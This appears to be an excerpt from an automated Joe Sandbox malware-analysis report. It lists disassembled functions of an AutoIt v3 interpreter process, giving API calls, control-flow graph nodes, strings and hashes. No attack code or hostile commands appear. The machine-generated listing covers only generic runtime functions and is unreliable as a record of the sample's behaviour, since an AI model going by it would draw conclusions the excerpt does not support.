                                                                • Part of subcall function 00C5551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00C94B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00C55539
                                                                • Part of subcall function 00C551BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C551E1
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C5534B
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C94BD7
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C94C18
                                                              • RegCloseKey.ADVAPI32(?), ref: 00C94C5A
                                                              • _wcslen.LIBCMT ref: 00C94CC1
                                                              • _wcslen.LIBCMT ref: 00C94CD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                              • API String ID: 98802146-2727554177
                                                              • Opcode ID: d1bdf565fc5740420e1b91840e629a6a1fe9a940a3c70d3f54d2e4d49724d908
                                                              • Instruction ID: 91c3ee8cd80a9168e6713384b26afefbe2638f53b0985eb8f11ae33ad0dabe76
                                                              • Opcode Fuzzy Hash: d1bdf565fc5740420e1b91840e629a6a1fe9a940a3c70d3f54d2e4d49724d908
                                                              • Instruction Fuzzy Hash: 20718D71504340AEC724EF69DC8596BBBE8FF68350F80042DF845C72A1EB719B4ACB65
                                                              Function 00C5345A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00C53465
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00C53474
                                                              • LoadIconW.USER32(00000063), ref: 00C5348A
                                                              • LoadIconW.USER32(000000A4), ref: 00C5349C
                                                              • LoadIconW.USER32(000000A2), ref: 00C534AE
                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C534C6
                                                              • RegisterClassExW.USER32(?), ref: 00C53517
                                                                • Part of subcall function 00C535AB: GetSysColorBrush.USER32(0000000F), ref: 00C535DE
                                                                • Part of subcall function 00C535AB: RegisterClassExW.USER32(00000030), ref: 00C53608
                                                                • Part of subcall function 00C535AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C53619
                                                                • Part of subcall function 00C535AB: InitCommonControlsEx.COMCTL32(?), ref: 00C53636
                                                                • Part of subcall function 00C535AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C53646
                                                                • Part of subcall function 00C535AB: LoadIconW.USER32(000000A9), ref: 00C5365C
                                                                • Part of subcall function 00C535AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C5366B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                              • String ID: #$0$AutoIt v3
                                                              • API String ID: 423443420-4155596026
                                                              • Opcode ID: cbef57b8168749be1a0f543f88ac91939a062896b184c38ee97cef131f93c563
                                                              • Instruction ID: d74da0e6ff4a8e2641a0059d2a10df38bd93908741ebb7d225dadfcc28c54f15
                                                              • Opcode Fuzzy Hash: cbef57b8168749be1a0f543f88ac91939a062896b184c38ee97cef131f93c563
                                                              • Instruction Fuzzy Hash: 872119B0900354ABDB20DFA5EC95BA97BB4EB1CB60F00001EF515E63A0D7B955568FA0
                                                              Function 00C53AA3 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 532COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 819 c53aa3-c53ac6 820 c94139-c9414c call cba12a 819->820 821 c53acc-c53b35 call c7019b call c57953 call c5bf07 call c57953 * 2 call c56e52 819->821 827 c94153-c9415b 820->827 855 c9456b-c9457b call cba12a 821->855 856 c53b3b-c53b48 call c56cce call c56b12 821->856 829 c9416b-c94173 827->829 830 c9415d-c94165 827->830 833 c9417e-c94186 829->833 834 c94175-c9417c 829->834 830->829 832 c53b64-c53bd3 call c5bf07 call c53a70 call c5bf07 call c5557e call c541c9 call c56bfa 830->832 870 c53bd9-c53c48 call c5bf07 * 2 call c5694e call c57af4 SetCurrentDirectoryW call c5bd2c * 2 call c7019b call c541a6 832->870 871 c941b4-c941bf 832->871 838 c94188-c9418f 833->838 839 c94191-c94199 833->839 837 c941a6-c941af call cbd4bf 834->837 837->832 838->837 839->832 843 c9419f-c941a1 839->843 843->837 862 c94580 855->862 866 c53b4d-c53b5e call c56afb 856->866 862->862 866->827 866->832 915 c53c4c-c53c51 870->915 871->870 873 c941c5-c941f8 call c57953 call c5636d 871->873 882 c941fe-c94225 call cc35cd call c563db 873->882 883 c94502-c94519 call cba12a 873->883 882->883 897 c9422b-c942a7 call c7016b call c5bc23 call c5bb3d 882->897 891 c53da5-c53df0 call c5bd2c * 2 call c57953 call c5bd2c call c57953 call c701a4 883->891 921 c942ad-c942cf call c5bc23 897->921 922 c9446f-c944ab call c5bc23 call cc13a0 call cb4a0c call c74d0e 897->922 918 c53c57-c53c64 call c5ad74 915->918 919 c53d71-c53d92 call c57953 SetCurrentDirectoryW 915->919 918->919 935 c53c6a-c53c86 call c54093 call c53ff3 918->935 919->891 936 c53d94-c53da2 call c7015d call c701a4 919->936 933 c942d1-c942e0 921->933 934 c942e5-c942f0 call cc14a6 921->934 966 c944ad-c944d2 call c55c10 call c701a4 call cc1388 922->966 939 c94401-c94414 call c5bb3d 933->939 949 c9430d-c94318 call cc1492 934->949 950 c942f2-c94308 934->950 964 c9454e-c94566 call cba12a 935->964 965 c53c8c-c53ca3 call c53fb8 call c74cf3 935->965 936->891 939->921 955 c9441a-c94424 939->955 969 c9431a-c94329 949->969 970 c9432e-c94339 call c6e607 949->970 950->939 961 c94457 call cba486 955->961 962 c94426-c94434 955->962 975 c9445c-c94469 961->975 962->961 967 c94436-c94455 call c540e0 962->967 964->919 988 c53ca5-c53cc0 call c76755 965->988 989 c53cc6-c53cc9 965->989 966->891 967->975 969->939 970->939 984 c9433f-c9435b call cb9f0d 970->984 975->921 975->922 1000 c9438a-c9438d 984->1000 1001 c9435d-c94388 call c5b25f call c5bd2c 984->1001 988->989 990 c53df3-c53df9 988->990 989->990 991 c53ccf-c53cd4 989->991 990->991 999 c53dff-c9452a 990->999 996 c9452f-c94537 call cb9dd5 991->996 997 c53cda-c53d13 call c5b25f call c53e15 991->997 1020 c9453c-c9453f 996->1020 1029 c53d15-c53d2c call c701a4 call c7015d 997->1029 1030 c53d30-c53d32 997->1030 999->991 1005 c943c9-c943cc 1000->1005 1006 c9438f-c943b5 call c5b25f call c57d27 call c5bd2c 1000->1006 1042 c943b6-c943c7 call c5bc23 1001->1042 1009 c943ed-c943f1 call cc142e 1005->1009 1010 c943ce-c943d7 call cb9e3c 1005->1010 1006->1042 1022 c943f6-c94400 call c701a4 1009->1022 1025 c943dd-c943e8 call c701a4 1010->1025 1026 c944d7-c94500 call cba12a call c701a4 call c74d0e 1010->1026 1027 c94545-c94549 1020->1027 1028 c53e08-c53e10 1020->1028 1022->939 1025->921 1026->966 1027->1028 1037 c53d5e-c53d6b 1028->1037 1029->1030 1040 c53e04 1030->1040 1041 c53d38-c53d3b 1030->1041 1037->915 1037->919 1040->1028 1041->1028 1047 c53d41-c53d44 1041->1047 1042->1022 1047->1020 1048 c53d4a-c53d59 call c540e0 1047->1048 1048->1037
                                                              APIs
                                                                • Part of subcall function 00C57953: CloseHandle.KERNELBASE(?,?,00000000,00C93A1C), ref: 00C57973
                                                                • Part of subcall function 00C56E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00C53B33,?,00008000), ref: 00C56E80
                                                              • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00C53C17
                                                              • _wcslen.LIBCMT ref: 00C53C96
                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 00C53D81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                              • API String ID: 3350465876-3738523708
                                                              • Opcode ID: 6043f49b5a680e503b4676ef4912d7a06f21ad06215d970ffe97ce5239d48a6a
                                                              • Instruction ID: f0b6dd755642733a9cac23ebd924e52d96cb010f5e4835b0bfbdd06ac2b07487
                                                              • Opcode Fuzzy Hash: 6043f49b5a680e503b4676ef4912d7a06f21ad06215d970ffe97ce5239d48a6a
                                                              • Instruction Fuzzy Hash: 6A22AD350083809FCB14EF24C881AAFBBF5BF94345F10491DF896972A2DB70DA89DB56
                                                              Function 00C53696 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1058 c53696-c536ab 1059 c536ad-c536b0 1058->1059 1060 c5370b-c5370d 1058->1060 1062 c53711 1059->1062 1063 c536b2-c536b9 1059->1063 1060->1059 1061 c5370f 1060->1061 1066 c536f6-c536fe DefWindowProcW 1061->1066 1067 c53717-c5371c 1062->1067 1068 c93dce-c93df6 call c52f24 call c6f1c6 1062->1068 1064 c536bf-c536c4 1063->1064 1065 c5378b-c53793 PostQuitMessage 1063->1065 1069 c93e3b-c93e4f call cbc80c 1064->1069 1070 c536ca-c536ce 1064->1070 1073 c5373f-c53741 1065->1073 1072 c53704-c5370a 1066->1072 1074 c53743-c5376a SetTimer RegisterWindowMessageW 1067->1074 1075 c5371e-c53721 1067->1075 1102 c93dfb-c93e02 1068->1102 1069->1073 1093 c93e55 1069->1093 1076 c53795-c5379f call c6fcbb 1070->1076 1077 c536d4-c536d9 1070->1077 1073->1072 1074->1073 1078 c5376c-c53777 CreatePopupMenu 1074->1078 1081 c53727-c5373a KillTimer call c5388e call c5572c 1075->1081 1082 c93d6f-c93d72 1075->1082 1095 c537a4 1076->1095 1083 c93e20-c93e27 1077->1083 1084 c536df-c536e4 1077->1084 1078->1073 1081->1073 1088 c93daa-c93dc9 MoveWindow 1082->1088 1089 c93d74-c93d78 1082->1089 1083->1066 1099 c93e2d-c93e36 call cb1367 1083->1099 1091 c53779-c53789 call c537a6 1084->1091 1092 c536ea-c536f0 1084->1092 1088->1073 1096 c93d99-c93da5 SetFocus 1089->1096 1097 c93d7a-c93d7d 1089->1097 1091->1073 1092->1066 1092->1102 1093->1066 1095->1073 1096->1073 1097->1092 1103 c93d83-c93d94 call c52f24 1097->1103 1099->1066 1102->1066 1107 c93e08-c93e1b call c5388e call c538f2 1102->1107 1103->1073 1107->1066
                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00C53690,?,?), ref: 00C536FE
                                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,00C53690,?,?), ref: 00C5372A
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C5374D
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00C53690,?,?), ref: 00C53758
                                                              • CreatePopupMenu.USER32 ref: 00C5376C
                                                              • PostQuitMessage.USER32(00000000), ref: 00C5378D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                              • String ID: TaskbarCreated
                                                              • API String ID: 129472671-2362178303
                                                              • Opcode ID: b3938b4327cd4cf00405290586f0fabdf5c26903bffe7ce9ebe4e3acd0985ce8
                                                              • Instruction ID: df730f5b103b48ab035d926574a615ef48d64feb003ff902446d128663b04716
                                                              • Opcode Fuzzy Hash: b3938b4327cd4cf00405290586f0fabdf5c26903bffe7ce9ebe4e3acd0985ce8
                                                              • Instruction Fuzzy Hash: BF4155B95142C0BBDB245B289D4EB7D3A55E7183D2F000129FD22CE394CB749BCA9639
                                                              Function 00C52A52 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1114 c52a52-c52a8b 1115 c52a91-c52aa7 mciSendStringW 1114->1115 1116 c939f4-c939f5 DestroyWindow 1114->1116 1117 c52aad-c52ab5 1115->1117 1118 c52d08-c52d15 1115->1118 1119 c93a00-c93a0d 1116->1119 1117->1119 1120 c52abb-c52aca call c52e70 1117->1120 1121 c52d17-c52d32 UnregisterHotKey 1118->1121 1122 c52d3a-c52d41 1118->1122 1126 c93a3c-c93a43 1119->1126 1127 c93a0f-c93a12 1119->1127 1134 c93a4a-c93a56 1120->1134 1135 c52ad0-c52ad8 1120->1135 1121->1122 1124 c52d34-c52d35 call c52712 1121->1124 1122->1117 1125 c52d47 1122->1125 1124->1122 1125->1118 1126->1119 1130 c93a45 1126->1130 1131 c93a1e-c93a21 FindClose 1127->1131 1132 c93a14-c93a1c call c57953 1127->1132 1130->1134 1136 c93a27-c93a34 1131->1136 1132->1136 1141 c93a58-c93a5a FreeLibrary 1134->1141 1142 c93a60-c93a67 1134->1142 1138 c93a6e-c93a7b 1135->1138 1139 c52ade-c52b03 call c5e650 1135->1139 1136->1126 1140 c93a36-c93a37 call cc3c0b 1136->1140 1146 c93a7d-c93a9a VirtualFree 1138->1146 1147 c93aa2-c93aa9 1138->1147 1152 c52b05 1139->1152 1153 c52b3a-c52b45 CoUninitialize 1139->1153 1140->1126 1141->1142 1142->1134 1145 c93a69 1142->1145 1145->1138 1146->1147 1148 c93a9c-c93a9d call cc3c71 1146->1148 1147->1138 1149 c93aab 1147->1149 1148->1147 1154 c93ab0-c93ab4 1149->1154 1155 c52b08-c52b38 call c53047 call c52ff0 1152->1155 1153->1154 1156 c52b4b-c52b50 1153->1156 1154->1156 1157 c93aba-c93ac0 1154->1157 1155->1153 1159 c52b56-c52b60 1156->1159 1160 c93ac5-c93ad2 call cc3c45 1156->1160 1157->1156 1161 c52b66-c52be7 call c5bd2c call c52f86 call c52e17 call c701a4 call c52dbe call c5bd2c call c5e650 call c52e40 call c701a4 1159->1161 1162 c52d49-c52d56 call c6fb27 1159->1162 1173 c93ad4 1160->1173 1177 c93ad9-c93afb call c7015d 1161->1177 1203 c52bed-c52c11 call c701a4 1161->1203 1162->1161 1175 c52d5c 1162->1175 1173->1177 1175->1162 1182 c93afd 1177->1182 1185 c93b02-c93b24 call c7015d 1182->1185 1191 c93b26 1185->1191 1194 c93b2b-c93b4d call c7015d 1191->1194 1201 c93b4f 1194->1201 1204 c93b54-c93b61 call cb6d63 1201->1204 1203->1185 1210 c52c17-c52c3b call c701a4 1203->1210 1209 c93b63 1204->1209 1212 c93b68-c93b75 call c6bd6a 1209->1212 1210->1194 1215 c52c41-c52c5b call c701a4 1210->1215 1218 c93b77 1212->1218 1215->1204 1220 c52c61-c52c85 call c52e17 call c701a4 1215->1220 1221 c93b7c-c93b89 call cc3b9f 1218->1221 1220->1212 1229 c52c8b-c52c93 1220->1229 1228 c93b8b 1221->1228 1231 c93b90-c93b9d call cc3c26 1228->1231 1229->1221 1230 c52c99-c52cb7 call c5bd2c call c52f4c 1229->1230 1230->1231 1240 c52cbd-c52ccb 1230->1240 1237 c93b9f 1231->1237 1239 c93ba4-c93bb1 call cc3c26 1237->1239 1245 c93bb3 1239->1245 1240->1239 1242 c52cd1-c52d07 call c5bd2c * 3 call c52eb8 1240->1242 1245->1245
                                                              APIs
                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C52A9B
                                                              • CoUninitialize.COMBASE ref: 00C52B3A
                                                              • UnregisterHotKey.USER32(?), ref: 00C52D1F
                                                              • DestroyWindow.USER32(?), ref: 00C939F5
                                                              • FreeLibrary.KERNEL32(?), ref: 00C93A5A
                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C93A87
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                              • String ID: close all
                                                              • API String ID: 469580280-3243417748
                                                              • Opcode ID: bc1521368a7d0c5cf653127cd06a13cd15d2cd0b31da2c3a95ba0088e347353a
                                                              • Instruction ID: 160393644b044d8d8cd8ce7456b13641e002913c4658efab2b076c5d77b3e5f2
                                                              • Opcode Fuzzy Hash: bc1521368a7d0c5cf653127cd06a13cd15d2cd0b31da2c3a95ba0088e347353a
                                                              • Instruction Fuzzy Hash: 31D18E35701252CFCB29EF15C889B29F7A0BF05701F1442ADE84A6B252CB71EE56DF88
                                                              Function 00CC874A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1253 cc874a-cc878c call c922f0 call c58e70 1258 cc878e-cc879c call c5c92d 1253->1258 1259 cc87a2 1253->1259 1258->1259 1267 cc879e-cc87a0 1258->1267 1261 cc87a4-cc87b0 1259->1261 1263 cc886d-cc891f call c58e70 call c5557e call c7d913 call c793c8 * 2 GetCurrentDirectoryW SetCurrentDirectoryW 1261->1263 1264 cc87b6 1261->1264 1298 cc8921-cc892d call cbe387 1263->1298 1299 cc8973-cc8984 call c5e650 1263->1299 1266 cc87ba-cc87c0 1264->1266 1269 cc87ca-cc87cf 1266->1269 1270 cc87c2-cc87c8 1266->1270 1267->1261 1273 cc87d9-cc87df 1269->1273 1274 cc87d1-cc87d4 1269->1274 1272 cc87d6 1270->1272 1272->1273 1276 cc8848-cc884a 1273->1276 1277 cc87e1-cc87e4 1273->1277 1274->1272 1280 cc884b-cc884e 1276->1280 1277->1276 1279 cc87e6-cc87e9 1277->1279 1282 cc87eb-cc87ee 1279->1282 1283 cc8844-cc8846 1279->1283 1284 cc8858 1280->1284 1285 cc8850-cc8856 1280->1285 1282->1283 1287 cc87f0-cc87f3 1282->1287 1288 cc883d-cc883e 1283->1288 1289 cc885c-cc8867 1284->1289 1285->1289 1291 cc87f5-cc87f8 1287->1291 1292 cc8840-cc8842 1287->1292 1288->1280 1289->1263 1289->1266 1291->1292 1294 cc87fa-cc87fd 1291->1294 1292->1288 1296 cc87ff-cc8802 1294->1296 1297 cc883b 1294->1297 1296->1297 1300 cc8804-cc8807 1296->1300 1297->1288 1298->1299 1311 cc892f-cc893a call cbe9c5 1298->1311 1310 cc8987-cc898b call c5bd2c 1299->1310 1303 cc8809-cc880c 1300->1303 1304 cc8834-cc8839 1300->1304 1303->1304 1307 cc880e-cc8811 1303->1307 1304->1280 1308 cc882d-cc8832 1307->1308 1309 cc8813-cc8816 1307->1309 1308->1280 1309->1308 1312 cc8818-cc881b 1309->1312 1317 cc8990-cc8998 1310->1317 1319 cc89cf 1311->1319 1320 cc8940-cc8967 GetFileAttributesW SetFileAttributesW 1311->1320 1315 cc881d-cc8820 1312->1315 1316 cc8826-cc882b 1312->1316 1315->1316 1321 cc899b-cc89af call c5e650 1315->1321 1316->1280 1322 cc89d3-cc89e5 call cc9f9f 1319->1322 1323 cc8969-cc8971 SetCurrentDirectoryW 1320->1323 1324 cc89b1-cc89b3 1320->1324 1321->1317 1330 cc89ea-cc89ec 1322->1330 1323->1299 1328 cc89b5-cc89cd SetCurrentDirectoryW call c74d13 1324->1328 1329 cc8a02-cc8a0c SetCurrentDirectoryW 1324->1329 1328->1322 1329->1310 1330->1329 1332 cc89ee-cc89fb call c5e650 1330->1332 1332->1329
                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CC8907
                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 00CC891B
                                                              • GetFileAttributesW.KERNEL32(?), ref: 00CC8945
                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00CC895F
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00CC8971
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00CC89BA
                                                              • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 00CC8A0A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$AttributesFile
                                                              • String ID: *.*
                                                              • API String ID: 769691225-438819550
                                                              • Opcode ID: ef4084911a23db87e556a39872c54dec06d5f7bb03aeee4bda44eeae07ea4252
                                                              • Instruction ID: 9aca7a1e130c08cea4ea3a7801e1c2336dc717822b33a20ad3926e9098abe0ca
                                                              • Opcode Fuzzy Hash: ef4084911a23db87e556a39872c54dec06d5f7bb03aeee4bda44eeae07ea4252
                                                              • Instruction Fuzzy Hash: EC819C725042009BCB20EF55C494FABB3E8BF84710F54482EF899D7691EB34DA49CB92
                                                              Function 00C890D5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1418 c890d5-c890e5 1419 c890ff-c89101 1418->1419 1420 c890e7-c890fa call c7f656 call c7f669 1418->1420 1422 c89469-c89476 call c7f656 call c7f669 1419->1422 1423 c89107-c8910d 1419->1423 1437 c89481 1420->1437 1442 c8947c call c82b7c 1422->1442 1423->1422 1426 c89113-c8913e 1423->1426 1426->1422 1427 c89144-c8914d 1426->1427 1430 c8914f-c89162 call c7f656 call c7f669 1427->1430 1431 c89167-c89169 1427->1431 1430->1442 1435 c8916f-c89173 1431->1435 1436 c89465-c89467 1431->1436 1435->1436 1441 c89179-c8917d 1435->1441 1439 c89484-c89489 1436->1439 1437->1439 1441->1430 1445 c8917f-c89196 1441->1445 1442->1437 1447 c89198-c8919b 1445->1447 1448 c891b3-c891bc 1445->1448 1449 c8919d-c891a3 1447->1449 1450 c891a5-c891ae 1447->1450 1451 c891da-c891e4 1448->1451 1452 c891be-c891d5 call c7f656 call c7f669 call c82b7c 1448->1452 1449->1450 1449->1452 1455 c8924f-c89269 1450->1455 1453 c891eb-c891ec call c83bb0 1451->1453 1454 c891e6-c891e8 1451->1454 1481 c8939c 1452->1481 1464 c891f1-c89209 call c82d58 * 2 1453->1464 1454->1453 1458 c8933d-c89346 call c8fc3b 1455->1458 1459 c8926f-c8927f 1455->1459 1470 c89348-c8935a 1458->1470 1471 c893b9 1458->1471 1459->1458 1463 c89285-c89287 1459->1463 1463->1458 1467 c8928d-c892b3 1463->1467 1491 c8920b-c89221 call c7f669 call c7f656 1464->1491 1492 c89226-c8924c call c897b4 1464->1492 1467->1458 1472 c892b9-c892cc 1467->1472 1470->1471 1476 c8935c-c8936b GetConsoleMode 1470->1476 1474 c893bd-c893d5 ReadFile 1471->1474 1472->1458 1477 c892ce-c892d0 1472->1477 1479 c89431-c8943c GetLastError 1474->1479 1480 c893d7-c893dd 1474->1480 1476->1471 1482 c8936d-c89371 1476->1482 1477->1458 1483 c892d2-c892fd 1477->1483 1485 c8943e-c89450 call c7f669 call c7f656 1479->1485 1486 c89455-c89458 1479->1486 1480->1479 1487 c893df 1480->1487 1489 c8939f-c893a9 call c82d58 1481->1489 1482->1474 1488 c89373-c8938d ReadConsoleW 1482->1488 1483->1458 1490 c892ff-c89312 1483->1490 1485->1481 1498 c8945e-c89460 1486->1498 1499 c89395-c8939b call c7f633 1486->1499 1494 c893e2-c893f4 1487->1494 1496 c893ae-c893b7 1488->1496 1497 c8938f GetLastError 1488->1497 1489->1439 1490->1458 1501 c89314-c89316 1490->1501 1491->1481 1492->1455 1494->1489 1505 c893f6-c893fa 1494->1505 1496->1494 1497->1499 1498->1489 1499->1481 1501->1458 1509 c89318-c89338 1501->1509 1512 c893fc-c8940c call c88df1 1505->1512 1513 c89413-c8941e 1505->1513 1509->1458 1524 c8940f-c89411 1512->1524 1518 c8942a-c8942f call c88c31 1513->1518 1519 c89420 call c88f41 1513->1519 1525 c89425-c89428 1518->1525 1519->1525 1524->1489 1525->1524
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
